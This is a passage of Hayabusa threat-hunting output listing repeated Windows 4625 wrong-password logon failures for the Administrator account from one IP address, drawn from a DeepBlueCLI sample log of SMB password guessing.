Administrator | Type: 3 | Computer: aX0wfTs5FzCdwGrR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.895 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9gdU6faDjEH5wW2X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 507PC8xD6l0TbhG3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VrWgYcf9EuXt4MHS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GvIGEw3fdX9cDzIV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.159 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9X1q0dT5irWa44Rz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:26.307 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZpgAkElSQjVo53z2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.410 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7nxUEwRMaiAhiIXv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vIoaysmFNfEerv8f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aHLhFgL0xfnrAIoF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.619 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YGK96B1hDPMK9YKh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yhDnNRDnAwctVtgQ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8zzO7RKaBPpg549A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.859 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zDgDGO3IKiLoIQ5D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aaYeBTUEudC3446 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I41H8U06uuGlMf9S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.170 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r6Eh55149gbuU2el | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: ajzJabQi7CjosFQ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l9y7gyU9aJi6Fpm3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.361 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hbLiIVcBYlu5JkX2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bDfEfHk54J3lJI6m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.496 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WOpuMTECalyeObl7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.537 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nZQYU1dyQOqlNJDL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:27.577 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pc58gDT07WNH3mMz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhExnDfInKbEI6AO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.710 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qKKTTQ0ZT2Ye4TV9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LdBFYyftnH67Gyh5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.812 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eO6c2PDl7zVBGzPi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1ONnDOs16EnBkdFv | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aTHHCX9EoKRY4zhR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.939 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f1jhH08oLzpONDpa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o2YK7zc7Ne9c8txA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.013 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 86CrOo9CFreIzSM5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0X9UEojEnc350xPc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 9g3PO3jofnySl92G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TRndfQmPYuhV0Ri | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.204 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yyJOdaks4B1sKMDv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IB3OSmcFx5TUiiJX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lo3Ex40dkIeO53HF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AkzDG8QOM2cxbokF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:28.395 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YoMf36ZXJBLnYxtc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.436 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5izPIefHqDDWNDlu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z9o4f1XvvcVXBNwL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IjCR48ZJFyEhzrYI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mUV9i4O2gapcC01d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJzGAMQCvJBFOUPq | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fyyu0x6I29R2J10Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.687 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8lCe1shqSs0xNwAJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ipZAMvm56d5mE9Fc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XX9N7jodTuEYBCSE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h5DBFGpzfJJ7gYV1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: fQ3qTwcWkXJDuXDI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TOfkvLSo2HuhMtvk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y9DQUhPQHvvwAO0C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.990 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yao1JM0tSFv5IHnL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NXGm63wiZz3ZYFb9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.077 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: izvPgZCO2GRVLhId | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:29.119 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iI9zO2o7jd922pfK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UnAGy86My6hVwt4J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HhFTzONSVEziRtgq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.251 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdEv4ooC8AApqU1T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TxFGRBKVK732Aeu4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ITg8QH90LKkAQMLL | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.377 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E8YKCN2uxmJtYxdW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.411 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lcVIqrTQbNLFW7Cr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.449 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: taZx68l1ci0i2XB0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Jjy0gZhZCc9dVGd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S1DxOWcNytmxHfxl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.555 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: JGRFWos3MJeQ0oAr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.593 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I3YXVTiQAGbf57TH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eWNsBwoGd36krY2U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HIobpWCoOHdD76lL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W91ruUEdXwRcMxVB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.743 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6PEs7fp97cYFf4vx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
